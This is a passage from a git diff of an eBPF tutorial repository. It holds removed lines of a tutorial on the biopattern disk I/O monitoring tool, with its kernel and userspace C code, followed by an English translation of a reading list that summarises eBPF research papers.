sequential I/O. Typical scenarios that generate random I/O include database queries, file system metadata operations, and concurrent tasks in virtualised environments. - -2. **Sequential I/O**: In contrast to random I/O, sequential I/O occurs when an application continuously reads or writes blocks of data to or from disk. The advantage of this I/O mode is that the disk head can move continuously in one direction, which greatly increases the speed at which data can be read and written. Video playback, downloading or uploading large files, and continuous logging are typical applications that generate sequential I/O. - -To optimise storage performance, it is critical to understand both random and sequential disk I/O. For example, random I/O-sensitive applications typically perform far better on SSDs than on traditional hard drives because SSDs have virtually no addressing latency when dealing with random I/Os. 
Conversely, for applications with a lot of sequential I/O, it is much more critical to maximize the sequential read and write speed of the disk. - -In the rest of this tutorial, we will discuss in detail how to use the eBPF tool to monitor and count both types of disk I/O in real time, which will not only help us better understand the I/O behaviour of the system, but will also provide us with strong data for further performance optimization. - -## Biopattern - -Biopattern counts the percentage of random/sequential disk I/Os. - -First of all, make sure that you have installed libbpf and the associated toolset correctly, you can find the source code here: [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) - -Navigate to the `biopattern` source directory and compile it using the `make` command: - -```bash -cd ~/bpf-developer-tutorial/src/17-biopattern -make -``` - -After successful compilation, you should see the `biopattern` executable in the current directory. The basic runtime commands are as follows: - -```bash -sudo ./biopattern [interval] [count] -``` - -For example, to print the output once per second for 10 seconds, you can run: - -```console -$ sudo ./biopattern 1 10 -Tracing block device I/O requested seeks... Hit Ctrl-C to end. -DISK %RND %SEQ COUNT KBYTES -sr0 0 100 3 0 -sr1 0 100 8 0 -sda 0 100 1 4 -sda 100 0 26 136 -sda 0 100 1 4 -``` - -The output columns have the following meanings: - -- `DISK`: Name of the disk being tracked. -- `%RND`: Percentage of random I/O. -- `%SEQ`: percentage of sequential I/O. -- `COUNT`: Number of I/O requests in the specified interval. -- `KBYTES`: amount of data (in KB) read and written in the specified time interval. - -From the above output, we can draw the following conclusions: - -- The `sr0` and `sr1` devices performed mostly sequential I/O during the observation period, but the amount of data was small. -- The `sda` device performed only random I/O during some time periods and only sequential I/O during other time periods. - -This information can help us understand the I/O pattern of the system so that we can target optimisation. 
- -## eBPF Biopattern Implementation Principles - -First, let's look at the eBPF kernel state code at the heart of biopattern: - -```c -#include -#include -#include -#include "biopattern.h" -#include "maps.bpf.h" -#include "core_fixes.bpf.h" - -const volatile bool filter_dev = false; -const volatile __u32 targ_dev = 0; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 64); - __type(key, u32); - __type(value, struct counter); -} counters SEC(".maps"); - -SEC("tracepoint/block/block_rq_complete") -int handle__block_rq_complete(void *args) -{ - struct counter *counterp, zero = {}; - sector_t sector; - u32 nr_sector; - u32 dev; - - if (has_block_rq_completion()) { - struct trace_event_raw_block_rq_completion___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } else { - struct trace_event_raw_block_rq_complete___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } - - if (filter_dev && targ_dev != dev) - return 0; - - counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); - if (!counterp) - return 0; - if (counterp->last_sector) { - if (counterp->last_sector == sector) - __sync_fetch_and_add(&counterp->sequential, 1); - else - __sync_fetch_and_add(&counterp->random, 1); - __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); - } - counterp->last_sector = sector + nr_sector; - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -Global variable definitions: - -```c - const volatile bool filter_dev = false; - const volatile __u32 targ_dev = 0; -``` - -These two global variables are used for device filtering. `filter_dev` determines whether device filtering is enabled or not, and `targ_dev` is the identifier of the target device we want to track. - -BPF map definition: - -```c - struct { __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 64); __type(key, u32); - __type(value, struct counter); - } counters SEC(".maps"). -``` - -This part of the code defines a BPF map of type hash table. The key of the map is the identifier of the device, and the value is a `counter` struct, which is used to store the I/O statistics of the device. - -The tracepoint function: - -```c - SEC("tracepoint/block/block_rq_complete") - int handle__block_rq_complete(void *args) - { - struct counter *counterp, zero = {}; - sector_t sector; - u32 nr_sector; - u32 dev; - - if (has_block_rq_completion()) { - struct trace_event_raw_block_rq_completion___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } else { - struct trace_event_raw_block_rq_complete___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } - - if (filter_dev && targ_dev != dev) - return 0; - - counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); - if (!counterp) - return 0; - if (counterp->last_sector) { - if (counterp->last_sector == sector) - __sync_fetch_and_add(&counterp->sequential, 1); - else - __sync_fetch_and_add(&counterp->random, 1); - __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); - } - counterp->last_sector = sector + nr_sector; - return 0; - } -``` - -In Linux, a trace point called `block_rq_complete` is triggered every time an I/O request for a block device completes. 
This provides an opportunity to capture these events with eBPF and further analyse the I/O patterns. - -Main Logic Analysis: - -- **Extracting I/O request information**: get information about the I/O request from the incoming parameters. There are two possible context structures depending on the return value of `has_block_rq_completion`. This is because different versions of the Linux kernel may have different tracepoint definitions. In either case, we extract the sector number `(sector)`, the number of sectors `(nr_sector)` and the device identifier `(dev)` from the context. - -- **Device filtering**: If device filtering is enabled `(filter_dev` is `true` ) and the current device is not the target device `(targ_dev` ), it is returned directly. This allows the user to track only specific devices, not all devices. - -- **Statistics update**: - - - **Lookup or initialise statistics**: use the `bpf_map_lookup_or_try_init` function to lookup or initialise statistics related to the current device. If there is no statistics for the current device in the map, it will be initialised using the `zero` structure. -- **Determine the I/O mode**: Based on the sector number of the current I/O request and the previous I/O request, we can determine whether the current request is random or sequential. If the sector numbers of the two requests are the same, then it is sequential; otherwise, it is random. We then use the `__sync_fetch_and_add` function to update the corresponding statistics. This is an atomic operation that ensures data consistency in a concurrent environment. -- **Update the amount of data**: we also update the total amount of data for the device, which is done by multiplying the number of sectors `(nr_sector` ) by 512 (the number of bytes per sector). -- **Update the sector number of the last I/O request**: for the next comparison, we update the value of `last_sector`. - -In some versions of the Linux kernel, the naming and structure of the tracepoint has changed due to the introduction of a new tracepoint, `block_rq_error`. This means that the structural name of the former `block_rq_complete` tracepoint has been changed from `trace_event_raw_block_rq_complete` to `trace_event_raw_block_rq_completion`, a change which may cause compatibility issues with eBPF programs on different versions of the kernel. This change may cause compatibility issues with eBPF programs on different versions of the kernel. - -To address this issue, the `biopattern` utility introduces a mechanism to dynamically detect which trace point structure is currently used by the kernel, namely the `has_block_rq_completion` function. - -1. **Define two trace point structures**: - -```c - struct trace_event_raw_block_rq_complete___x { - dev_t dev; - sector_t sector; - unsigned int nr_sector; - } __attribute__((preserve_access_index)); - - struct trace_event_raw_block_rq_completion___x { - dev_t dev; - sector_t sector; - unsigned int nr_sector; - } __attribute__((preserve_access_index)); -``` - -Two tracepoint structures are defined here, corresponding to different versions of the kernel. Each structure contains a device identifier `(dev` ), sector number `(sector` ), and number of sectors `(nr_sector` ). 
- -**Dynamic detection of trackpoint structures**: - -```c - static __always_inline bool has_block_rq_completion() - { - if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) - return true; - return false; - } -``` - -The `has_block_rq_completion` function uses the `bpf_core_type_exists` function to detect the presence of the structure `trace_event_raw_block_rq_completion___x` in the current kernel. If it exists, the function returns `true`, indicating that the current kernel is using the new tracepoint structure; otherwise, it returns `false`, indicating that it is using the old structure. The two different definitions are handled separately in the corresponding eBPF code, which is a common solution for adapting to changes between kernel versions. - -### User State Code - -The `biopattern` tool's userland code is responsible for reading statistics from the BPF mapping and presenting them to the user. In this way, system administrators can monitor the I/O patterns of each device in real time to better understand and optimise the I/O performance of the system. - -1. Main loop - -```c - /* main: poll */ - while (1) { - sleep(env.interval); - - err = print_map(obj->maps.counters, partitions); - if (err) - break; - - if (exiting || --env.times == 0) - break; - } -``` - -This is the main loop of the `biopattern` utility, and its workflow is as follows: - -- **Wait**: use the `sleep` function to wait for the specified interval `(env.interval` ). -- `print_map`: call `print_map` function to print the statistics in BPF map. -- **Exit condition**: if an exit signal is received `(exiting` is `true` ) or if the specified number of runs is reached `(env.times` reaches 0), the loop exits. - -Print mapping function: - -```c - static int print_map(struct bpf_map *counters, struct partitions *partitions) - { - __u32 total, lookup_key = -1, next_key; - int err, fd = bpf_map__fd(counters); - const struct partition *partition; - struct counter counter; - struct tm *tm; - char ts[32]; - time_t t; - - while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { - err = bpf_map_lookup_elem(fd, &next_key, &counter); - if (err < 0) { - fprintf(stderr, "failed to lookup counters: %d\n", err); - return -1; - } - lookup_key = next_key; - total = counter.sequential + counter.random; - if (!total) - continue; - if (env.timestamp) { - time(&t); - tm = localtime(&t); - strftime(ts, sizeof(ts), "%H:%M:%S", tm); - printf("%-9s ", ts); - } - partition = partitions__get_by_dev(partitions, next_key); - printf("%-7s %5ld %5ld %8d %10lld\n", - partition ? partition->name : "Unknown", - counter.random * 100L / total, - counter.sequential * 100L / total, total, - counter.bytes / 1024); - } - - lookup_key = -1; - while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { - err = bpf_map_delete_elem(fd, &next_key); - if (err < 0) { - fprintf(stderr, "failed to cleanup counters: %d\n", err); - return -1; - } - lookup_key = next_key; - } - - return 0; - } -``` - -The `print_map` function is responsible for reading statistics from the BPF map and printing them to the console. The main logic is as follows: - -- **Traverse the BPF map**: Use the `bpf_map_get_next_key` and `bpf_map_lookup_elem` functions to traverse the BPF map and get the statistics for each device. -- **Calculate totals**: Calculate the total number of random and sequential I/Os for each device. -- **Print statistics**: If timestamp is enabled `(env.timestamp` is `true` ), the current time is printed first. 
Next, the device name, percentage of random I/O, percentage of sequential I/O, total I/O, and total data in KB are printed.
-- **Cleaning up the BPF map**: For the next count, use the `bpf_map_get_next_key` and `bpf_map_delete_elem` functions to clean up all entries in the BPF map.
-
-## Summary
-
-In this tutorial, we have taken an in-depth look at how to use the eBPF tool biopattern to monitor and count random and sequential disk I/O in real-time. we started by understanding the importance of random and sequential disk I/O and their impact on system performance. We then describe in detail how biopattern works, including how to define and use BPF maps, how to deal with tracepoint variations in different versions of the Linux kernel, and how to capture and analyse disk I/O events in an eBPF program.
-
-You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial.
-
-- Source repo:
-- bcc tool:
-
-> The original link of this article:
diff --git a/src/18-further-reading/README.md b/src/18-further-reading/README.md
index 3a71301..458612e 100644
--- a/src/18-further-reading/README.md
+++ b/src/18-further-reading/README.md
@@ -1,149 +1,140 @@
-# 更多的参考资料:论文、项目等等
+# More Reference Materials: papers, projects

-可以在这里找到更多关于 eBPF 的信息:
+You may find more about eBPF in these places:

-- 一个关于 eBPF 相关内容和信息的详细列表:
-- eBPF 相关项目、教程:
+- A curated list of awesome projects related to eBPF:
+- A website of eBPF projects and tutorials:

-这是我近年来读过的与 eBPF 相关的论文列表,可能对于对 eBPF 相关研究感兴趣的人有所帮助。
+This is also a list of eBPF-related papers I have read in recent years, which might be helpful for people who are interested in eBPF-related research.

-eBPF(扩展的伯克利数据包过滤器)是一种新兴的技术,允许在 Linux 内核中安全地执行用户提供的程序。近年来,它因加速网络处理、增强可观察性和实现可编程数据包处理而得到了广泛的应用。此文档列出了过去几年关于 eBPF 的一些关键研究论文。这些论文涵盖了 eBPF 的几个方面,包括加速分布式系统、存储和网络,正式验证 eBPF 的 JIT 编译器和验证器,将 eBPF 用于入侵检测,以及从 eBPF 程序自动生成硬件设计。
+eBPF (extended Berkeley Packet Filter) is an emerging technology that allows safe execution of user-provided programs in the Linux kernel. It has gained widespread adoption in recent years for accelerating network processing, enhancing observability, and enabling programmable packet processing.

-一些关键亮点:
+This document lists some key research papers on eBPF from the past few years. The papers cover several aspects of eBPF, including accelerating distributed systems, storage, and networking, formally verifying the eBPF JIT compiler and verifier, applying eBPF for intrusion detection, and automatically generating hardware designs from eBPF programs.

-- eBPF 允许在内核中执行自定义函数,以加速分布式协议、存储引擎和网络应用,与传统的用户空间实现相比,可以提高吞吐量和降低延迟。
+Some key highlights:

-- eBPF 组件(如 JIT 和验证器)的正式验证确保了正确性,并揭示了实际实现中的错误。
-- eBPF 的可编程性和效率使其适合在内核中完全构建入侵检测和网络监控应用。
-- 从 eBPF 程序中自动生成硬件设计允许软件开发人员快速生成网络卡中的优化数据包处理管道。
+- eBPF enables executing custom functions in the kernel to accelerate distributed protocols, storage engines, and networking applications with improved throughput and lower latency compared to traditional userspace implementations.
+- Formal verification of eBPF components like JIT and verifier ensures correctness and reveals bugs in real-world implementations.
+- eBPF's programmability and efficiency make it suitable for building intrusion detection and network monitoring applications entirely in the kernel.
+- Automated synthesis of hardware designs from eBPF programs allows software developers to quickly generate optimized packet processing pipelines in network cards.

-这些论文展示了 eBPF 在加速系统、增强安全性和简化网络编程方面的多功能性。随着 eBPF 的采用不断增加,它是一个与性能、安全性、硬件集成和易用性相关的系统研究的重要领域。
+The papers demonstrate eBPF's versatility in accelerating systems, enhancing security, and simplifying network programming. As eBPF adoption grows, it is an important area of systems research with many open problems related to performance, safety, hardware integration, and ease of use.

-如果您有任何建议或添加论文的意见,请随时开放一个问题或PR。此列表创建于 2023.10,未来将添加新的论文。
+If you have any suggestions or papers to add, please feel free to open an issue or PR. The list was created in 2023.10; new papers will be added in the future.

-> 如果您对 eBPF 有些进一步的兴趣的话,也可以查看我们在 [eunomia-bpf](https://github.com/eunomia-bpf) 的开源项目和 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 的 eBPF 教程。我也在寻找 2024/2025 年系统和网络领域的 PhD 相关机会,这是我的 [Github](https://github.com/yunwei37) 和 [邮箱](yunwei356@gmail.com)。
+> Check out our open-source projects at [eunomia-bpf](https://github.com/eunomia-bpf) and eBPF tutorials at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial). I'm also looking for a PhD position in the area of systems and networking in 2024/2025. My [Github](https://github.com/yunwei37) and [email](yunwei356@gmail.com).

## XRP: In-Kernel Storage Functions with eBPF

-随着微秒级 NVMe 存储设备的出现,Linux 内核存储堆栈开销变得显著,几乎使访问时间翻倍。我们介绍了 XRP,一个框架,允许应用程序从 eBPF 在 NVMe 驱动程序中的钩子执行用户定义的存储功能,如索引查找或聚合,安全地绕过大部分内核的存储堆栈。为了保持文件系统的语义,XRP 将少量的内核状态传播到其 NVMe 驱动程序钩子,在那里调用用户注册的 eBPF 函数。我们展示了如何利用 XRP 显著提高两个键值存储,BPF-KV,一个简单的 B+ 树键值存储,和 WiredTiger,一个流行的日志结构合并树存储引擎的吞吐量和延迟。
+With the emergence of microsecond-scale NVMe storage devices, the Linux kernel storage stack overhead has become significant, almost doubling access times. We present XRP, a framework that allows applications to execute user-defined storage functions, such as index lookups or aggregations, from an eBPF hook in the NVMe driver, safely bypassing most of the kernel’s storage stack. To preserve file system semantics, XRP propagates a small amount of kernel state to its NVMe driver hook where the user-registered eBPF functions are called. We show how two key-value stores, BPF-KV, a simple B+-tree key-value store, and WiredTiger, a popular log-structured merge tree storage engine, can leverage XRP to significantly improve throughput and latency.

-OSDI '22 最佳论文:
+OSDI '22 Best Paper:

## Specification and verification in the field: Applying formal methods to BPF just-in-time compilers in the Linux kernel

-本文描述了我们将形式方法应用于 Linux 内核中的一个关键组件,即 Berkeley 数据包过滤器 (BPF) 虚拟机的即时编译器 ("JIT") 的经验。我们使用 Jitterbug 验证这些 JIT,这是第一个提供 JIT 正确性的精确规范的框架,能够排除实际错误,并提供一个自动化的证明策略,该策略可以扩展到实际实现。使用 Jitterbug,我们设计、实施并验证了一个新的针对 32 位 RISC-V 的 BPF JIT,在五个其他部署的 JIT 中找到并修复了 16 个之前未知的错误,并开发了新的 JIT 优化;所有这些更改都已上传到 Linux 内核。结果表明,在一个大型的、未经验证的系统中,通过仔细设计规范和证明策略,可以构建一个经过验证的组件。
+This paper describes our experience applying formal methods to a critical component in the Linux kernel, the just-in-time compilers ("JITs") for the Berkeley Packet Filter (BPF) virtual machine. We verify these JITs using Jitterbug, the first framework to provide a precise specification of JIT correctness that is capable of ruling out real-world bugs, and an automated proof strategy that scales to practical implementations.
Using Jitterbug, we have designed, implemented, and verified a new BPF JIT for 32-bit RISC-V, found and fixed 16 previously unknown bugs in five other deployed JITs, and developed new JIT optimizations; all of these changes have been upstreamed to the Linux kernel. The results show that it is possible to build a verified component within a large, unverified system with careful design of specification and proof strategy. OSDI 20: ## λ-IO: A Unified IO Stack for Computational Storage -新兴的计算存储设备为存储内计算提供了一个机会。它减少了主机与设备之间的数据移动开销,从而加速了数据密集型应用程序。在这篇文章中,我们介绍 λ-IO,一个统一的 IO 堆栈,跨主机和设备管理计算和存储资源。我们提出了一套设计 - 接口、运行时和调度 - 来解决三个关键问题。我们在全堆栈软件和硬件环境中实施了 λ-IO,并使用合成和实际应用程序对其 - -进行评估,与 Linux IO 相比,显示出高达 5.12 倍的性能提升。 +The emerging computational storage device offers an opportunity for in-storage computing. It alleviates the overhead of data movement between the host and the device, and thus accelerates data-intensive applications. In this paper, we present λ-IO, a unified IO stack managing both computation and storage resources across the host and the device. We propose a set of designs – interface, runtime, and scheduling – to tackle three critical issues. We implement λ-IO in full-stack software and hardware environment, and evaluate it with synthetic and real applications against Linux IO, showing up to 5.12× performance improvement. FAST23: ## Extension Framework for File Systems in User space -用户文件系统相对于其内核实现提供了许多优势,例如开发的简易性和更好的系统可靠性。然而,它们会导致重大的性能损失。我们观察到现有的用户文件系统框架非常通用;它们由一个位于内核中的最小干预层组成,该层简单地将所有低级请求转发到用户空间。虽然这种设计提供了灵活性,但由于频繁的内核-用户上下文切换,它也严重降低了性能。 +User file systems offer numerous advantages over their in-kernel implementations, such as ease of development and better system reliability. However, they incur heavy performance penalty. We observe that existing user file system frameworks are highly general; they consist of a minimal interposition layer in the kernel that simply forwards all low-level requests to user space. While this design offers flexibility, it also severely degrades performance due to frequent kernel-user context switching. -这项工作介绍了 ExtFUSE,一个用于开发可扩展用户文件系统的框架,该框架还允许应用程序在内核中注册"薄"的专用请求处理程序,以满足其特定的操作需求,同时在用户空间中保留复杂的功能。我们使用两个 FUSE 文件系统对 ExtFUSE 进行评估,结果表明 ExtFUSE 可以通过平均不到几百行的改动来提高用户文件系统的性能。ExtFUSE 可在 GitHub 上找到。 +This work introduces ExtFUSE, a framework for developing extensible user file systems that also allows applications to register "thin" specialized request handlers in the kernel to meet their specific operative needs, while retaining the complex functionality in user space. Our evaluation with two FUSE file systems shows that ExtFUSE can improve the performance of user file systems with less than a few hundred lines on average. ExtFUSE is available on GitHub. ATC 19: ## Electrode: Accelerating Distributed Protocols with eBPF -在标准的Linux内核网络栈下实现分布式协议可以享受到负载感知的CPU缩放、高兼容性以及强大的安全性和隔离性。但由于过多的用户-内核切换和内核网络栈遍历,其性能较低。我们介绍了Electrode,这是一套为分布式协议设计的基于eBPF的性能优化。这些优化在网络栈之前在内核中执行,但实现了与用户空间中实现的相似功能(例如,消息广播,收集ack的仲裁),从而避免了用户-内核切换和内核网络栈遍历所带来的开销。我们展示,当应用于经典的Multi-Paxos状态机复制协议时,Electrode可以提高其吞吐量高达128.4%,并将延迟降低高达41.7%。 +Implementing distributed protocols under a standard Linux kernel networking stack enjoys the benefits of load-aware CPU scaling, high compatibility, and robust security and isolation. However, it suffers from low performance because of excessive user-kernel crossings and kernel networking stack traversing. We present Electrode with a set of eBPF-based performance optimizations designed for distributed protocols. 
These optimizations get executed in the kernel before the networking stack but achieve similar functionalities as were implemented in user space (e.g., message broadcasting, collecting quorum of acknowledgments), thus avoiding the overheads incurred by user-kernel crossings and kernel networking stack traversing. We show that when applied to a classic Multi-Paxos state machine replication protocol, Electrode improves its throughput by up to 128.4% and latency by up to 41.7%. -NSDI 23: [链接](https://www.usenix.org/conference/nsdi23/presentation/zhou) +NSDI 23: ## BMC: Accelerating Memcached using Safe In-kernel Caching and Pre-stack Processing -内存键值存储是帮助扩展大型互联网服务的关键组件,通过提供对流行数据的低延迟访问。Memcached是最受欢迎的键值存储之一,由于Linux网络栈固有的性能限制,当使用高速网络接口时,其性能不高。虽然可以使用DPDK基础方案绕过Linux网络栈,但这种方法需要对软件栈进行完全重新设计,而且在客户端负载较低时也会导致高CPU利用率。 +In-memory key-value stores are critical components that help scale large internet services by providing low-latency access to popular data. Memcached, one of the most popular key-value stores, suffers from performance limitations inherent to the Linux networking stack and fails to achieve high performance when using high-speed network interfaces. While the Linux network stack can be bypassed using DPDK based solutions, such approaches require a complete redesign of the software stack and induce high CPU utilization even when client load is low. -为了克服这些限制,我们提出了BMC,这是一个为Memcached设计的内核缓存,可以在执行标准网络栈之前服务于请求。对BMC缓存的请求被视为NIC中断的一部分,这允许性能随着为NIC队列服务的核心数量而扩展。为确保安全,BMC使用eBPF实现。尽管eBPF具有安全约束,但我们展示了实现复杂缓存服务是可能的。因为BMC在商用硬件上运行,并且不需要修改Linux内核或Memcached应用程序,所以它可以在现有系统上广泛部署。BMC优化了Facebook样式的小型请求的处理时间。在这个目标工作负载上,我们的评估显示,与原始的Memcached应用程序相比,BMC的吞吐量提高了高达18倍,与使用SO_REUSEPORT套接字标志的优化版Memcached相比,提高了高达6倍。此外,我们的结果还显示,对于非目标工作负载,BMC的开销可以忽略不计,并且不会降低吞吐量。 +To overcome these limitations, we present BMC, an in-kernel cache for Memcached that serves requests before the execution of the standard network stack. Requests to the BMC cache are treated as part of the NIC interrupts, which allows performance to scale with the number of cores serving the NIC queues. To ensure safety, BMC is implemented using eBPF. Despite the safety constraints of eBPF, we show that it is possible to implement a complex cache service. Because BMC runs on commodity hardware and requires modification of neither the Linux kernel nor the Memcached application, it can be widely deployed on existing systems. BMC optimizes the processing time of Facebook-like small-size requests. On this target workload, our evaluations show that BMC improves throughput by up to 18x compared to the vanilla Memcached application and up to 6x compared to an optimized version of Memcached that uses the SO_REUSEPORT socket flag. In addition, our results also show that BMC has negligible overhead and does not deteriorate throughput when treating non-target workloads. -NSDI 21: [链接](https://www.usenix.org/conference/nsdi21/presentation/ghigoff) +NSDI 21: ## hXDP: Efficient Software Packet Processing on FPGA NICs -FPGA加速器在NIC上使得从CPU卸载昂贵的数据包处理任务成为可能。但是,FPGA有限的资源可能需要在多个应用程序之间共享,而编程它们则很困难。 +FPGA accelerators on the NIC enable the offloading of expensive packet processing tasks from the CPU. However, FPGAs have limited resources that may need to be shared among diverse applications, and programming them is difficult. 
-
-我们提出了一种在FPGA上运行Linux的eXpress Data Path程序的解决方案,这些程序使用eBPF编写,仅使用可用硬件资源的一部分,同时匹配高端CPU的性能。eBPF的迭代执行模型不适合FPGA加速器。尽管如此,我们展示了,当针对一个特定的FPGA执行器时,一个eBPF程序的许多指令可以被压缩、并行化或完全删除,从而显著提高性能。我们利用这一点设计了hXDP,它包括(i)一个优化编译器,该编译器并行化并将eBPF字节码转换为我们定义的扩展eBPF指令集架构;(ii)一个在FPGA上执行这些指令的软处理器;以及(iii)一个基于FPGA的基础设施,提供XDP的maps和Linux内核中定义的helper函数。
+We present a solution to run Linux's eXpress Data Path programs written in eBPF on FPGAs, using only a fraction of the available hardware resources while matching the performance of high-end CPUs. The iterative execution model of eBPF is not a good fit for FPGA accelerators. Nonetheless, we show that many of the instructions of an eBPF program can be compressed, parallelized or completely removed, when targeting a purpose-built FPGA executor, thereby significantly improving performance. We leverage that to design hXDP, which includes (i) an optimizing-compiler that parallelizes and translates eBPF bytecode to an extended eBPF Instruction-set Architecture defined by us; (ii) a soft-processor to execute such instructions on FPGA; and (iii) an FPGA-based infrastructure to provide XDP's maps and helper functions as defined within the Linux kernel.

-我们在FPGA NIC上实现了hXDP,并评估了其运行真实世界的未经修改的eBPF程序的性能。我们的实现以156.25MHz的速度时钟,使用约15%的FPGA资源,并可以运行动态加载的程序。尽管有这些适度的要求,但它达到了高端CPU核心的数据包处理吞吐量,并提供了10倍低的数据包转发延迟。
+We implement hXDP on an FPGA NIC and evaluate it running real-world unmodified eBPF programs. Our implementation is clocked at 156.25MHz, uses about 15% of the FPGA resources, and can run dynamically loaded programs. Despite these modest requirements, it achieves the packet processing throughput of a high-end CPU core and provides a 10x lower packet forwarding latency.

-OSDI 20: [链接](https://www.usenix.org/conference/osdi20/presentation/brunella)
+OSDI 20:

## Network-Centric Distributed Tracing with DeepFlow: Troubleshooting Your Microservices in Zero Code

-微服务正变得越来越复杂,给传统的性能监控解决方案带来了新的挑战。一方面,微服务的快速演变给现有的分布式跟踪框架的使用和维护带来了巨大的负担。另一方面,复杂的基础设施增加了网络性能问题的概率,并在网络侧创造了更多的盲点。在这篇论文中,我们介绍了 DeepFlow,一个用于微服务故障排除的以网络为中心的分布式跟踪框架。DeepFlow 通过一个以网络为中心的跟踪平面和隐式的上下文传播提供开箱即用的跟踪。此外,它消除了网络基础设施中的盲点,以低成本方式捕获网络指标,并增强了不同组件和层之间的关联性。我们从分析和实证上证明,DeepFlow 能够准确地定位微服务性能异常,而开销几乎可以忽略不计。DeepFlow 已经为超过26家公司发现了71多个关键性能异常,并已被数百名开发人员所使用。我们的生产评估显示,DeepFlow 能够为用户节省数小时的仪表化工作,并将故障排除时间从数小时缩短到几分钟。
+Microservices are becoming more complicated, posing new challenges for traditional performance monitoring solutions. On the one hand, the rapid evolution of microservices places a significant burden on the utilization and maintenance of existing distributed tracing frameworks. On the other hand, complex infrastructure increases the probability of network performance problems and creates more blind spots on the network side. In this paper, we present DeepFlow, a network-centric distributed tracing framework for troubleshooting microservices. DeepFlow provides out-of-the-box tracing via a network-centric tracing plane and implicit context propagation. In addition, it eliminates blind spots in network infrastructure, captures network metrics in a low-cost way, and enhances correlation between different components and layers. We demonstrate analytically and empirically that DeepFlow is capable of locating microservice performance anomalies with negligible overhead. DeepFlow has already identified over 71 critical performance anomalies for more than 26 companies and has been utilized by hundreds of individual developers.
Our production evaluations demonstrate that DeepFlow is able to save users hours of instrumentation efforts and reduce troubleshooting time from several hours to just a few minutes. SIGCOMM 23: ## Fast In-kernel Traffic Sketching in eBPF -扩展的伯克利数据包过滤器(eBPF)是一个基础设施,允许在不重新编译的情况下动态加载并直接在 Linux 内核中运行微程序。 +The extended Berkeley Packet Filter (eBPF) is an infrastructure that allows to dynamically load and run micro-programs directly in the Linux kernel without recompiling it. -在这项工作中,我们研究如何在 eBPF 中开发高性能的网络测量。我们以绘图为案例研究,因为它们具有支持广泛任务的能力,同时提供低内存占用和准确性保证。我们实现了 NitroSketch,一个用于用户空间网络的最先进的绘图,并表明用户空间网络的最佳实践不能直接应用于 eBPF,因为它的性能特点不同。通过应用我们学到的经验教训,我们将其性能提高了40%,与初级实现相比。 +In this work, we study how to develop high-performance network measurements in eBPF. We take sketches as case-study, given their ability to support a wide-range of tasks while providing low-memory footprint and accuracy guarantees. We implemented NitroSketch, the state-of-the-art sketch for user-space networking and show that best practices in user-space networking cannot be directly applied to eBPF, because of its different performance characteristics. By applying our lesson learned we improve its performance by 40% compared to a naive implementation. SIGCOMM 23: ## SPRIGHT: extracting the server from serverless computing! high-performance eBPF-based event-driven, shared-memory processing -无服务器计算在云环境中承诺提供高效、低成本的计算能力。然而,现有的解决方案,如Knative这样的开源平台,包含了繁重的组件,破坏了无服务器计算的目标。此外,这种无服务器平台缺乏数据平面优化,无法实现高效的、高性能的功能链,这也是流行的微服务开发范式的设施。它们为构建功能链使用的不必要的复杂和重复的功能严重降低了性能。"冷启动"延迟是另一个威慑因素。 +Serverless computing promises an efficient, low-cost compute capability in cloud environments. However, existing solutions, epitomized by open-source platforms such as Knative, include heavyweight components that undermine this goal of serverless computing. Additionally, such serverless platforms lack dataplane optimizations to achieve efficient, high-performance function chains that facilitate the popular microservices development paradigm. Their use of unnecessarily complex and duplicate capabilities for building function chains severely degrades performance. 'Cold-start' latency is another deterrent. -我们描述了 SPRIGHT,一个轻量级、高性能、响应式的无服务器框架。SPRIGHT 利用共享内存处理显著提高了数据平面的可伸缩性,通过避免不必要的协议处理和序列化-反序列化开销。SPRIGHT 大量利用扩展的伯克利数据包过滤器 (eBPF) 进行事件驱动处理。我们创造性地使用 eBPF 的套接字消息机制支持共享内存处理,其开销严格与负载成正比。与常驻、基于轮询的DPDK相比,SPRIGHT 在真实工作负载下实现了相同的数据平面性能,但 CPU 使用率降低了10倍。此外,eBPF 为 SPRIGHT 带来了好处,替换了繁重的无服务器组件,使我们能够以微不足道的代价保持函数处于"暖"状态。 +We describe SPRIGHT, a lightweight, high-performance, responsive serverless framework. SPRIGHT exploits shared memory processing and dramatically improves the scalability of the dataplane by avoiding unnecessary protocol processing and serialization-deserialization overheads. SPRIGHT extensively leverages event-driven processing with the extended Berkeley Packet Filter (eBPF). We creatively use eBPF's socket message mechanism to support shared memory processing, with overheads being strictly load-proportional. Compared to constantly-running, polling-based DPDK, SPRIGHT achieves the same dataplane performance with 10× less CPU usage under realistic workloads. Additionally, eBPF benefits SPRIGHT, by replacing heavyweight serverless components, allowing us to keep functions 'warm' with negligible penalty. 
